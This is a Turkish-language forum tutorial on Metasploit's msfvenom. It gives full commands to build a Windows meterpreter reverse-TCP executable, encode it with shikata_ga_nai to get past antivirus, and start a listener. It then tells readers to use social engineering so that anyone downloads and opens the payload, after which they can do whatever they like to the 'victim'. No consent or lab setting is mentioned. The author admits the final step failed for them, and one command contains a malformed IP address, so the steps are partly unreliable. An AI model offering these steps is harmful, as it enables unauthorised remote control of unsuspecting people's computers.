Msfvenom Nedir?
Metasploit Framework yani "MSFVENOM"güvenlik açıklarından yararlanmaya ve doğrulamaya yönelik bir penetrasyon testi aracıdır. Sızma testi ve kapsamlı güvenlik değerlendirmesi için gereken temel mimariyi, özel içeriği ve araçları içerir. Düzenli olarak güncellenen, iyi bilinen bir kullanım çerçevesidir; yeni Exploitler duyurulur duyurulmaz dahil edilir. Güvenlik açığı ve sızma testi sistemleri için güvenlik çalışma alanları oluşturmaya yönelik bir dizi araç içerir.
Msfvenom'un 3 çeşitli payload türü bulunmaktadır. Bu 3 temel kategori genelde hep kullanacağımız kategorilerdir.
1. Single: Karşı bilgisayar ve kendi bilgisayarımız arasında bağlantı kuran, bağlantı kurduktan sonrada bir takım belirli işlemler yapmamız sağlayan payloadlardandır.
2. Stagers: Hedef makine ile Metasploit sunucusundaki payload işlemcisi arasında bir ağ bağlantısı oluşturmak için Stager'i kullanır. Stager, daha küçük bir yük kullanarak, aşama olarak bilinen daha büyük, daha karmaşık bir Payload yüklemenize ve yerleştirmenize olanak tanır.
3. Meterpreter: Meterpreter, hedef sistemin programlara nasıl göz attığını ve yürüttüğünü etkileyen bir davetsiz misafir faktörü sağlayan bir Metasploit saldırı payload'ına dönüşmüştür. Meterpreter, sabit sürücüye yazmayan, yalnızca belleğe sahip bir programdır. Meterpreter, diğer işleyen yöntemlere geçebileceği yerden kendisini saldırıya uğrayan sürece enjekte etmeye çalıştı; sonuç olarak yeni bir süreç oluşturulmadı. Meterpreter, komut yazmaya izin verirken ve şifreli bağlantı sağlarken belirli veri yüklerini kullanmanın dezavantajlarından kaçınmak için tasarlanmıştır. Belirli veri payloadları'nı kullanmanın dezavantajı, hedef sistemde daha yeni bir süreç başlarsa alarmların oluşturulabilmesidir. Single payload bakımından, Meterpreter ile daha fazla işlem yapılabilmektedir.
MSFVENOM Kullanımı:
Kurulum kısmına değinmeğeceğim. Çünkü araç indirilmiş halde gelir.
İlk olarak terminali başlatın, Daha sonra
Kod:
msfconsole
Görsel bana aittir.
Msfvenom ile Ters TCP verisi oluşturacağız. Bu veri, çalıştırıldığında kullanıcının makinesini Metasploit işleyicimize bağlayan ve bir ölçüm cihazı oturumu yürütmemize olanak tanıyan bir yürütülebilir dosya oluşturur. msfvenom'un çok çeşitli seçenekleri mevcuttur.
Konsola
Kod:
msfvenom -h
Görsel bana aittir.
Evet şimdi ise Kali Linux üzerinden Metasploit ile bir payload oluşturalım.
Kod:
msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.43 LPORT=4444 -f exe -o payload.exe
Görsel bana aittir.
-a, –platform ve -p seçeneklerini kullanarak mimariyi, platformu ve kullanılacak yük türünü belirtebilirsiniz. Lhost, saldırganın, yükün bağlanması gereken IP adresi gibi görünüyor. Lport yukarıdakiyle aynıdır; bu, yükün bağlanacağı bağlantı noktasıdır ve işleyicide belirtilmesi gerekir. -f, Msfvenom'a yükün nasıl üretileceğini söyler; bu durumda bu, yürütülebilir bir program veya exe'dir.
Örneğin: -a parametremiz ile mimariyi ayarlıyoruz yani yukarıdaki komuttada verildiği gibi "x86"
-platform parametremiz ile payloadımızın çalışacağı işletim sistemini ayarlıyoruz. Örneğin "--platform windows"
-p veya -payload parametremiz ile kullanmak istediğimiz payload türünü seçiyoruz.
Örneğin: "windows/meterpreter/reverse_tcp" veya "windows/meterpreter/reverse_http"
Daha fazla payload türünü öğrenmek veya kullanmak istiyorsanız.
Konsola "msfvenom -l payload" yazarak. Payload türlerine gözatabilirsiniz.
Neyse şimdi yukarıda payloadımızı yazdık daha durun anti-virüslerden kaçınmak için encoders kullanacağız.
Payload Oluştururken Encoders Kullanma
Anti-virüs yazılımı tarafından tespit edilmekten kaçınmak için payload oluştururken bir kodlayıcı kullanabiliriz. Kodlayıcı, veri bölümünden tüm hedef payload üzerinden geçer ve her baytı belirli bir anahtarla dönüştürür.
Terminale aşağıdaki kodu yazarak farklı kodlayıcı(Encoders) göz atabilirsiniz.
Kod:
msfvenom -l encoders
Görsel bana aittir.
Daha önce oluşturduğumuz Payload'a "x86/shikata_ga_nai" kodlamasını uygulayacağız.
Peki neden "shikata_ga_nai" çünkü olimorfik ikili kodlama şeması kullanan bir Payload ve veri gizleme tekniğidir. Hemde kullanımı oldukça kolay diğer araçlar gibi şimdi ise konsola
Kod:
msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.43 LPORT=4444 -i 10 -e x86/shikata_ga_nai -f exe -o payload.exe
Görsel bana aittir.
-i komutu ile encoding işlem sayısını belirtiyoruz.
Şimdi ise son aşama olarak payloadımızı çalıştıralım.
Şimdi ise
1. use multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST <İP>
4. set LPORT 4444
5. Exploit
ve Payloadımız dinlemeye alıyor sosyal mühendislik becerinizi kullanarak herhangi birisine kurduğumuz payload'ı indirtebilirseniz ve kurbanımız bunu açarsa Payload otomatik olarak dinlemeye geçecektir.
Ve dinlemeye geçtikten sonra konsola Help yazarak kurbana istediğinizi yapabilirsiniz ben alıntı bir fotoğraf koyacağım.
Görsel bana ait değildir.
Konumuz bu kadar umarım beğenmişsinizdir.
Ben payloadı fotoğraflarla anlatırken malesef sonda exploit yazdığım yerde
started reverse TCP handler on 0.0.0.0:4444 olduğu yerde kalıyor o yüzden son fotoğraftan alıntı yaptım.
Apache veya network'de sorun olduğunu düsüşünüyorum çünkü herşey kaç kez gözden geçirdim. Daha bilgili olan kişiler yardım ederse çok iyi olur.
Konun sonu malesef biraz eksik oldu o yüzden youtubeden bir video bırakıyorum buraya sizler için.
